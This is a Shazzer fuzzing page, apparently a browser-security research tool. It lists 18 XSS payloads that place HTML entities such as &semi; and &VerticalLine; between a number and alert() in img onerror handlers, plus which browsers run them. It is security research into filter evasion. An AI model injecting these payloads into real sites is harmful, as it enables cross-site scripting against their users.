Entities allowed between function call and number

Chrome logo 18
Safari logo 18
Firefox logo 18

This vector uses Shazzer's new features to check which entities are allowed between a function call and number using images. The results are a bit inconsistent yet because I currently wait for page load.

Created by: hackvertor

Created on: Tuesday, July 2, 2024 at 11:29:20 AM

Updated on: Wednesday, December 11, 2024 at 8:38:38 PM

Vector type: XSS

Vector charset: UTF-8

Template used:
<img src=data: onerror="1$[data1]log('html($[data1])')">
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...

Sample payloads

<img src=data: onerror="1&VerticalLine;alert('&#38;VerticalLine;')">
<img src=data: onerror="1&semi;alert('&#38;semi;')">
<img src=data: onerror="1&midast;alert('&#38;midast;')">
<img src=data: onerror="1&amp;alert('&#38;amp;')">
<img src=data: onerror="1&NewLine;alert('&#38;NewLine;')">
<img src=data: onerror="1&plus;alert('&#38;plus;')">
<img src=data: onerror="1&LT;alert('&#38;LT;')">
<img src=data: onerror="1&sol;alert('&#38;sol;')">
<img src=data: onerror="1&ast;alert('&#38;ast;')">
<img src=data: onerror="1&Hat;alert('&#38;Hat;')">
<img src=data: onerror="1&lt;alert('&#38;lt;')">
<img src=data: onerror="1&verbar;alert('&#38;verbar;')">
<img src=data: onerror="1&comma;alert('&#38;comma;')">
<img src=data: onerror="1&gt;alert('&#38;gt;')">
<img src=data: onerror="1&vert;alert('&#38;vert;')">
<img src=data: onerror="1&GT;alert('&#38;GT;')">
<img src=data: onerror="1&AMP;alert('&#38;AMP;')">
<img src=data: onerror="1&percnt;alert('&#38;percnt;')">

Fuzz results

Chrome logo
Chrome 126.0.0.0 desktop macOS 10.15.7

Updated

Tue Jul 02 2024
Found 18 results
Loading...
Safari logo
Safari 18.0 desktop macOS 10.15.7

Updated

Tue Jul 02 2024
Found 18 results
Loading...
Firefox logo
Firefox 127.0 desktop macOS 10.15

Updated

Tue Jul 02 2024
Found 18 results
Loading...